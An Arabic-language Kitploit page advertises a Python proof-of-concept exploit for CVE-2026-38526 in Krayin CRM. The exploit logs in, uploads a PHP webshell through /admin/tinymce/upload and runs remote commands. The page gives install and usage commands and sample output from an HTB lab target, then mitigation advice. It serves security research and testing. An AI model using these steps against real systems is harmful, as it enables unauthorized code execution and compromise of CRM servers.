Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38526 — Python PoC يستغل CVE-2026-38526 في Krayin CRM <= 2.2.x: يقوم بالمصادقة، ويرفع PHP webshell عبر /admin/tinymce/upload، وينفذ الأوامر عن بُعد. | Kitploit
أدوات/GitHubGitHub/mrdark-ops/cve-2026-38526
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبCTFاختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubmrdark-ops/cve-2026-38526

CVE-2026-38526

Python PoC يستغل CVE-2026-38526 في Krayin CRM <= 2.2.x: يقوم بالمصادقة، ويرفع PHP webshell عبر /admin/tinymce/upload، وينفذ الأوامر عن بُعد.

عرض المستودع
منذ 2 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38526 — Krayin CRM ≤ 2.2.x تنفيذ تعليمات برمجية عن بُعد بعد المصادقة

⚠️ تنبيه قانوني: هذا الكود مُقدَّم لأغراض تعليمية وللاختبارات المصرَّح بها فقط (CTF، bug bounty، مختبر خاص). المؤلف غير مسؤول عن أي استخدام غير قانوني.

الوصف

Krayin CRM (Webkul) ≤ 2.2.x يكشف عن نقطة النهاية /admin/tinymce/upload التي تتيح لمستخدم مُصادَق عليه (حتى بصلاحيات منخفضة) رفع ملفات دون التحقق من الامتداد. يُخدَّم الملف بعد ذلك من مجلد storage/، مما يتيح التنفيذ التعسفي لكود PHP.

  • النوع: رفع ملف عشوائي → RCE
  • CVSS: 9.9 (حرج)
  • المصادقة مطلوبة: نعم (أي حساب صالح)

التثبيت

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

الاستخدام

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

الخيارات:

الخيارالوصف
-t, --targetعنوان URL الجذر للهدف
-u, --userالبريد الإلكتروني لحساب Krayin
-p, --passwordكلمة المرور
-c, --commandالأمر المراد تنفيذه (الافتراضي: id)
--login-pathمسار تسجيل الدخول (الافتراضي: /admin/login)
--upload-pathمسار الرفع (الافتراضي: /admin/tinymce/upload)
--timeoutمهلة HTTP (الافتراضي: 15)

مثال

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] استرجاع رمز CSRF من http://billing.nexus.htb/admin/login
[*] إرسال نموذج تسجيل الدخول
[+] تمت المصادقة بنجاح
[*] رفع x8f2k1ab.php عبر http://billing.nexus.htb/admin/tinymce/upload
[+] webshell متاح على: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] التنفيذ: id

============================================================
[+] الأمر: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

التخفيف

  • تحديث Krayin CRM إلى الإصدار المُصحَّح.
  • تقييد امتدادات الملفات المرفوعة (قائمة بيضاء).
  • منع تنفيذ PHP في مجلدات storage/ و uploads/.
  • تطبيق مبدأ أقل صلاحية على حسابات CRM.

إخلاء المسؤولية

هذا المشروع منشور لأغراض البحث الأمني. أي استخدام ضد أنظمة دون إذن كتابي مسبق غير قانوني ومحظور تمامًا.

تنزيل الأداة